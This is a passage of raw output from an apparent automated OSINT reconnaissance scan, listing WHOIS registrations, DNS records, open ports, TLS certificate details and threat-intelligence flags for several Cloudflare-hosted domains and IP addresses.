Expiry Date: 2023-05-04T07:57:38Z created: 2009-01-15T07:26:19Z last-update: 2022-06-20T12:09:11Z source: FRNIC nserver: ns1.eurodns.com nserver: ns2.eurodns.com source: FRNIC registrar: EURODNS S.A. address: Array address: L-3372 LEUDELANGE country: LU phone: +352.2637251 e-mail: registryinfo@eurodns.com website: http://www.eurodns.com anonymous: No registered: 2003-09-22T00:00:00Z source: FRNIC nic-hdl: AA4055-FRNIC type: PERSON contact: Anouar Adlani address: EuroDNS SA address: 24 rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.2637252 fax-no: +352.26372537 e-mail: staff@eurodns.com registrar: EURODNS S.A. changed: 2022-12-16T09:25:25.326593Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5624-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. changed: 2015-09-24T11:47:25Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5623-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. 
changed: 2015-09-24T11:47:26Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.410349Z <<< 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2096 104.21.28.240 2022-12-18 00:08:42 Malicious IP on Same Subnet Yes CleanTalk Spam List 0 0 3 0 None CleanTalk Spam List [81.88.48.0/20] https://iplists.firehol.org/files/cleantalk_7d.ipset 81.88.48.0/20 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.111 90.116.166.104 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None serviciosbancpichinchacomecu--ecuador0.repl.co 34.149.204.188 2022-12-18 00:21:06 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T23:35:44.052Z", "ip": "172.67.147.230", "location_updated_at": "2022-12-10T07:08:41.264508Z", "autonomous_system_updated_at": "2022-12-06T09:10:52.468541Z", "location": {"country": "United States", "coordinates": {"latitude": 37.751, "longitude": -97.822}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"mail.upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-11-27T14:00:56.071530334Z"}, "quitranar.ml": {"record_type": "A", "resolved_at": "2022-12-07T15:46:34.241206539Z"}, "tilburg-zonnepaneel.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:34:05.587034691Z"}, "www.e-curtainhouse.com": {"record_type": "A", "resolved_at": "2022-10-09T13:20:14.433946877Z"}, "new.dalvinder.xyz": {"record_type": "A", "resolved_at": "2022-12-15T17:22:59.386173414Z"}, "efileperm.com": {"record_type": "A", "resolved_at": "2022-12-09T13:18:47.471783046Z"}, "riseboro.org": {"record_type": "A", "resolved_at": "2022-12-04T17:01:30.547466207Z"}, "webmail.fancyacake.net": {"record_type": "A", "resolved_at": 
"2022-12-07T16:18:29.035790767Z"}, "update.wpvivid.com": {"record_type": "A", "resolved_at": "2022-12-06T04:51:56.379698765Z"}, "www.riseboro.org": {"record_type": "A", "resolved_at": "2022-12-05T16:46:55.187302730Z"}, "consuggtolacar.tk": {"record_type": "A", "resolved_at": "2022-12-08T16:57:17.976506713Z"}, "emiliesteban.com": {"record_type": "A", "resolved_at": "2022-12-02T13:27:01.611968342Z"}, "anininfio.ml": {"record_type": "A", "resolved_at": "2022-12-06T16:03:13.345248276Z"}, "cpcontacts.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-11-29T13:58:34.097869492Z"}, "theoutermostbrewhouse.com": {"record_type": "A", "resolved_at": "2022-11-17T13:55:21.891733439Z"}, "gsb.group": {"record_type": "A", "resolved_at": "2022-12-10T14:35:16.342630588Z"}, "contkakenestloonsui.tk": {"record_type": "A", "resolved_at": "2022-11-26T21:52:37.207837340Z"}, "neva.news": {"record_type": "A", "resolved_at": "2022-12-11T16:31:31.034925098Z"}, "chondharbalege.ga": {"record_type": "A", "resolved_at": "2022-11-22T15:25:05.326318931Z"}, "www.myjoyofliving.com": {"record_type": "A", "resolved_at": "2022-12-06T13:59:10.503989250Z"}, "fetch-an-in-laptops-hindi.fyi": {"record_type": "A", "resolved_at": "2022-12-14T15:13:14.662634430Z"}, "cpcalendars.webelievenow.com": {"record_type": "A", "resolved_at": "2022-11-30T14:17:36.399825699Z"}, "nevereveremma.com": {"record_type": "A", "resolved_at": "2022-12-07T00:42:45.561323960Z"}, "hormonewellnesscourse.com": {"record_type": "A", "resolved_at": "2022-12-08T13:25:49.088906678Z"}, "persiapanmasukptn.com": {"record_type": "A", "resolved_at": "2022-12-03T13:54:49.453799338Z"}, "cpcontacts.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-10T12:12:10.879895874Z"}, "holistic-holidays.com": {"record_type": "A", "resolved_at": "2022-11-20T13:29:50.235437517Z"}, "a-prime-us-credit-cards.zone": {"record_type": "A", "resolved_at": "2022-12-10T19:10:07.986427709Z"}, "bongocat.click": {"record_type": "A", 
"resolved_at": "2022-09-28T12:37:32.167148526Z"}, "leaseislim.com": {"record_type": "A", "resolved_at": "2022-12-11T13:42:12.341163044Z"}, "www.hubenglish.com": {"record_type": "CNAME", "resolved_at": "2022-11-12T13:23:00.315871231Z"}, "www.irfay.com": {"record_type": "A", "resolved_at": "2022-12-15T13:29:47.863991120Z"}, "mail.batonrougekennelclub.com": {"record_type": "A", "resolved_at": "2022-12-11T13:12:16.359208221Z"}, "www.multpaineis.com.br": {"record_type": "A", "resolved_at": "2022-12-13T12:17:18.074275378Z"}, "tadratallureworkshop.com": {"record_type": "A", "resolved_at": "2022-12-14T14:28:44.431583448Z"}, "cpanel.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-12-09T14:02:13.774105248Z"}, "cpcalendars.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-16T12:14:10.984577406Z"}, "webminders.it": {"record_type": "A", "resolved_at": "2022-12-04T15:14:16.127245896Z"}, "fatosbrasil.com.br": {"record_type": "A", "resolved_at": "2022-11-22T12:16:24.488082020Z"}, "ontontocaltersla.tk": {"record_type": "A", "resolved_at": "2022-11-14T16:49:07.690130423Z"}, "thenheppsinforddantca.tk": {"record_type": "A", "resolved_at": "2022-12-09T16:45:26.377109728Z"}, "betdarmbattnebac.tk": {"record_type": "A", "resolved_at": "2022-11-25T17:21:28.898975806Z"}, "yquqxrm.tk": {"record_type": "A", "resolved_at": "2022-12-13T00:24:31.856245021Z"}, "cpanel.protipsnetbd.com": {"record_type": "A", "resolved_at": "2022-10-29T18:59:35.908349611Z"}, "opantupa.tk": {"record_type": "A", "resolved_at": "2022-11-25T17:23:00.565856379Z"}, "tticarotliesan.ml": {"record_type": "A", "resolved_at": "2022-11-19T15:09:51.128787748Z"}, "solidnmr.hu": {"record_type": "A", "resolved_at": "2022-12-02T15:08:14.087465067Z"}, "payswix.net": {"record_type": "A", "resolved_at": "2022-11-30T16:10:06.525978748Z"}, "meovanew.tk": {"record_type": "A", "resolved_at": "2022-12-14T17:42:19.596891632Z"}, "en.sapnemedekhna.com": {"record_type": "A", "resolved_at": 
"2022-12-06T14:21:24.557280221Z"}, "beeorganic.us": {"record_type": "A", "resolved_at": "2022-11-15T16:26:23.105182582Z"}, "clutuniphitan.tk": {"record_type": "A", "resolved_at": "2022-12-12T21:11:40.460069897Z"}, "hjnjq.com": {"record_type": "A", "resolved_at": "2022-11-16T13:27:49.652192119Z"}, "www.standrewslean.com": {"record_type": "A", "resolved_at": "2022-12-11T14:18:35.859066431Z"}, "banadislifo.tk": {"record_type": "A", "resolved_at": "2022-11-22T16:56:32.784672802Z"}, "greatcasthid.ga": {"record_type": "A", "resolved_at": "2022-10-05T15:08:16.386848914Z"}, "portgenpill.tk": {"record_type": "A", "resolved_at": "2022-12-08T13:39:15.894610809Z"}, "blogcast.support": {"record_type": "A", "resolved_at": "2022-12-04T17:20:24.016832384Z"}, "turdadissitedri.ga": {"record_type": "A", "resolved_at": "2022-11-16T14:52:23.820492206Z"}, "webdisk.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-02T12:18:13.327934825Z"}, "johnparkeraesthetics.com": {"record_type": "A", "resolved_at": "2022-12-14T13:44:36.052499508Z"}, "davisresearch.org": {"record_type": "A", "resolved_at": "2022-11-25T16:58:47.029248229Z"}, "webdisk.nensi.eu": {"record_type": "A", "resolved_at": "2022-11-13T14:26:06.988304058Z"}, "warmodeon.com": {"record_type": "A", "resolved_at": "2022-12-10T14:04:27.488932415Z"}, "gamewinwin.net": {"record_type": "A", "resolved_at": "2022-12-15T16:02:24.221785118Z"}, "webmail.dialectict.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:33:27.083591618Z"}, "tiaronamescio.tk": {"record_type": "A", "resolved_at": "2022-12-16T16:42:57.572866945Z"}, "wild-fire-3893.2864713421.workers.dev": {"record_type": "A", "resolved_at": "2022-12-15T14:33:28.163019076Z"}, "geolapkimblomid.tk": {"record_type": "A", "resolved_at": "2022-09-28T19:07:16.273366860Z"}, "www.bettingmarket.org": {"record_type": "A", "resolved_at": "2022-12-07T17:08:23.110463705Z"}, "upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-11-29T14:12:38.043402115Z"}, 
"tlosguaconfma.cf": {"record_type": "A", "resolved_at": "2022-12-10T12:28:48.978211423Z"}, "cpanel.theerathornnft.com": {"record_type": "A", "resolved_at": "2022-11-20T14:11:12.522505839Z"}, "sensatravel.info": {"record_type": "A", "resolved_at": "2022-12-07T18:33:52.634075353Z"}, "xewapuda.rest": {"record_type": "A", "resolved_at": "2022-10-23T17:07:42.738597699Z"}, "brasfaberk.ga": {"record_type": "A", "resolved_at": "2022-12-12T01:18:17.897930376Z"}, "www.majeronibraces.com": {"record_type": "A", "resolved_at": "2022-11-26T13:38:16.539310269Z"}, "www.hookup.directory": {"record_type": "A", "resolved_at": "2022-12-14T15:00:30.848178149Z"}, "lagostechweek.ng": {"record_type": "A", "resolved_at": "2022-12-05T16:40:44.108614046Z"}, "majeronibraces.com": {"record_type": "A", "resolved_at": "2022-12-16T13:31:16.728181958Z"}, "freelancejobsdb.com": {"record_type": "A", "resolved_at": "2022-11-22T09:21:04.975125532Z"}, "gamedancer.com": {"record_type": "A", "resolved_at": "2022-12-05T13:24:48.451841013Z"}, "hookup.directory": {"record_type": "A", "resolved_at": "2022-12-02T14:51:20.104694579Z"}, "cloudzeroseven.com": {"record_type": "A", "resolved_at": "2022-11-25T13:14:29.278842680Z"}, "diabottsassou.ga": {"record_type": "A", "resolved_at": "2022-12-14T15:13:01.041649671Z"}, "cansundemir.com": {"record_type": "A", "resolved_at": "2022-12-14T13:17:59.610572794Z"}, "deedattractiveauthority.quest": {"record_type": "A", "resolved_at": "2022-09-29T22:33:59.901364108Z"}, "www.carstenjohnsen.org": {"record_type": "A", "resolved_at": "2022-12-16T16:24:49.705500452Z"}, "www.lovepaper.org.au": {"record_type": "A", "resolved_at": "2022-12-11T12:15:23.828613355Z"}, "db.web.koongroup.com": {"record_type": "A", "resolved_at": "2022-12-13T13:41:23.435566162Z"}, "forgetfulcorn.xyz": {"record_type": "A", "resolved_at": "2022-12-16T16:53:12.007013166Z"}, "fototayland.ru": {"record_type": "A", "resolved_at": "2022-12-11T16:48:25.638065248Z"}, "www.makecoloradohome.com": {"record_type": 
"A", "resolved_at": "2022-12-13T13:44:08.455137791Z"}, "mail.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-11-18T12:15:11.721015572Z"}, "prabinkumarmahato.com.np": {"record_type": "A", "resolved_at": "2022-11-19T16:16:56.449332581Z"}, "fatootaconssac.cf": {"record_type": "A", "resolved_at": "2022-12-12T12:26:52.345682761Z"}, "fancyacake.net": {"record_type": "A", "resolved_at": "2022-11-30T15:56:40.221799680Z"}, "purplepapaya.ga": {"record_type": "A", "resolved_at": "2022-12-02T15:05:00.676061294Z"}, "artopicolma.tk": {"record_type": "A", "resolved_at": "2022-11-19T16:34:56.998683369Z"}, "tg.news": {"record_type": "A", "resolved_at": "2022-12-09T16:17:30.852668666Z"}}, "names": ["a-prime-us-credit-cards.zone", "meovanew.tk", "theoutermostbrewhouse.com", "fancyacake.net", "cansundemir.com", "tilburg-zonnepaneel.nl", "www.hookup.directory", "www.myjoyofliving.com", "purplepapaya.ga", "cpanel.theerathornnft.com", "johnparkeraesthetics.com", "cpcontacts.sectraexpress.com", "mail.batonrougekennelclub.com", "tiaronamescio.tk", "hormonewellnesscourse.com", 172.67.147.230 2022-12-18 00:11:01 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: y.wtf Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registry Expiry Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396850 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: xTom GmbH Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED 
FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. 
provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: Y.WTF Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registrar Registration Expiration Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396x850 Domain Status: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: contact via https://www.1api.net/send-message/y.wtf/registrant Registry Admin ID: Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: contact via https://www.1api.net/send-message/y.wtf/admin Registry Tech ID: Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED 
FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: contact via https://www.1api.net/send-message/y.wtf/tech Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. ; This data is provided for information purposes, and to assist persons ; obtaining information about or related to domain name registration ; records. We do not guarantee its accuracy. ; By submitting a WHOIS query, you agree that you will use this data ; only for lawful purposes and that, under no circumstances, you will ; use this data to ; 1) allow, enable, or otherwise support the transmission of mass ; unsolicited, commercial advertising or solicitations via E-mail ; (spam); or ; 2) enable high volume, automated, electronic processes that apply ; to this WHOIS server. ; These terms may be changed without prior notice. ; By submitting this query, you agree to abide by this policy. 
misogyn.y.wtf 2022-12-18 00:40:47 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.11] https://www.virustotal.com/en/ip-address/188.114.96.11/information/ 188.114.96.0/24 2022-12-18 00:04:38 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [188.114.96.0] 188.114.96.0 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Brazil 20.226.83.185 2022-12-18 00:05:54 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.ca plague.fun 2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:80 188.114.97.0/24 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/master.css?v=1.7.0 http://webmail.zerotwo-best-waifu.online/ 2022-12-18 00:18:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.3:80 188.114.97.0/24 2022-12-18 00:16:58 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "89493", "accept-ranges": "bytes", "last-modified": "Wed, 15 Dec 2021 09:50:30 GMT", "connection": "keep-alive", "etag": "\"61b9ba66-15d95\"", "date": "Sun, 18 Dec 2022 00:16:49 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "application/javascript"} http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:26:44 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [34.149.204.188] 34.149.204.188 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [autoconfig.zerotwo-best-waifu.online] autoconfig.zerotwo-best-waifu.online 2022-12-18 00:16:59 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "1305", "accept-ranges": "bytes", "last-modified": "Fri, 12 Feb 2021 14:43:40 GMT", "connection": "keep-alive", "etag": "\"6026941c-519\"", "date": "Sun, 18 Dec 2022 00:16:59 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/css"} http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:33:43 Open TCP 
Port No Pulsedive 0 0 4 0 None 195.110.124.188:8443 195.110.124.0/24 2022-12-18 00:27:43 Similar Domain - Whois No Whois 0 0 2 0 None % The WHOIS service offered by ROTLD and the access to the records in the ROTLD WHOIS database % are provided for information purposes and to be used within the scope of technical or administrative % necessities of Internet operation or to remedy legal problems. The use for other purposes, % in particular for advertising and domain hunting, is not permitted. % Without prejudice to the above, it is explicitly forbidden to extract, copy and/or use or re-utilise % in any form and by any means (electronically or not) the whole or a quantitatively or qualitatively % substantial part of the contents of the WHOIS database without prior and explicit permission by ROTLD, % nor in any attempt hereof, to apply automated, electronic processes to ROTLD (or its systems). % ROTLD cannot, under any circumstances, be held liable in case the stored information would prove % to be wrong, incomplete or not accurate in any sense. % You agree that any reproduction and/or transmission of data for commercial purposes will always % be considered as the extraction of a substantial part of the content of the WHOIS database. % By submitting the query you agree to abide by this policy and accept that ROTLD can take measures % to limit the use of its WHOIS services in order to protect the privacy of its registrants or the % integrity of the database. % The ROTLD WHOIS service on port 43 never discloses any information concerning the registrant. 
% Registrant information can be obtained through use of the web-based whois service available from % the ROTLD website www.rotld.ro Domain Name: plague.ro Registered On: 2019-08-19 Expires On: 2023-08-18 Registrar: ICI - Registrar Referral URL: http://www.rotld.ro DNSSEC: Inactive Nameserver: kami.ns.cloudflare.com Nameserver: donald.ns.cloudflare.com Domain Status: OK plague.ro 2022-12-18 00:11:29 Legal Entity Identifier No GLEIF 0 0 3 0 None 549300F1AETTPWFIQC02 Identity Digital Inc. 2022-12-18 00:06:15 HTTP Headers No Web Spider 1 0 1 0 None {"date": "Sun, 18 Dec 2022 00:06:15 GMT", "content-length": "29", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} misogyny.wtf 2022-12-18 00:03:07 Internet Name No DNS Resolver 0 0 2 0 None rasputain.fr Certificate: Data: Version: 3 (0x2) Serial Number: 0f:0e:0e:28:f1:c6:cb:2f:ce:67:1d:a6:c8:b8:7a:b2 Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Jan 17 00:00:00 2022 GMT Not After : Jan 17 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ba:07:4b:f6:cd:75:2e:c1:25:8d:34:ab:3e:b4: aa:17:69:09:33:64:8d:12:4c:78:e7:a9:12:25:17: 21:a5:8d:70:39:49:dd:46:db:8d:c9:8d:58:c6:8b: dc:76:18:a8:1e:77:71:72:01:4a:e8:e3:da:d8:35: 79:51:6a:a1:4f ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 02:2A:86:DC:E3:73:06:B6:9C:5B:CA:6F:78:47:D8:90:1D:C4:4C:66 X509v3 Subject Alternative Name: DNS:rasputain.fr, DNS:*.rasputain.fr, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: 
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA256 30:45:02:20:6f:73:02:9b:eb:82:c0:18:89:d7:54:b9:e8:bf: f7:f2:1a:58:cf:21:10:20:9e:f3:e5:90:50:67:fa:98:63:5a: 02:21:00:90:dd:98:e7:fb:4d:8d:1d:3e:1c:97:37:b2:0c:3e: fe:ac:a8:3e:a2:86:2b:2b:f1:cd:c9:00:51:71:fa:b7:4a 2022-12-18 00:06:21 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.de plague.fun 2022-12-18 00:16:57 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=UTF-8 webmail.zerotwo-best-waifu.online 2022-12-18 00:13:24 Internet Name No DNS Brute-forcer 7 1 1 0 None ftp.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [mail.zerotwo-best-waifu.online] mail.zerotwo-best-waifu.online 2022-12-18 00:03:01 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.94 90.116.166.104 2022-12-18 00:09:18 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b9326af686a6ba5929dc', u'leak': {u'dataset': {u'files': 0, 
u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Raccourcis personnalis\xe9s dans After Effects', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.ridcasib.gq', u'ridcasib.gq'], u'cn': u'*.ridcasib.gq', u'valid': True, u'not_after': u'2023-02-01T17:06:19Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'17f90ab081bda153ca6efb07f230a67a13d0390159eb20b845c1f8ccc7494904', u'key_algo': u'ECDSA', u'not_before': u'2022-11-03T17:06:20Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'ridcasib.gq', u'summary': u'Date: Thu, 03 Nov 2022 18:06:43 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Hetdgi50%2BlJsbdeBEG9hrcAj0COviGuk1OztFT1J1FLwUJFj1ydJVL%2BKPyncE2BDENb1xZ3D3OSsickkQYM3m7dXoHs%2FgueihGk03aHW13EbmWt6O8MuxZipD2VQGQ%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: 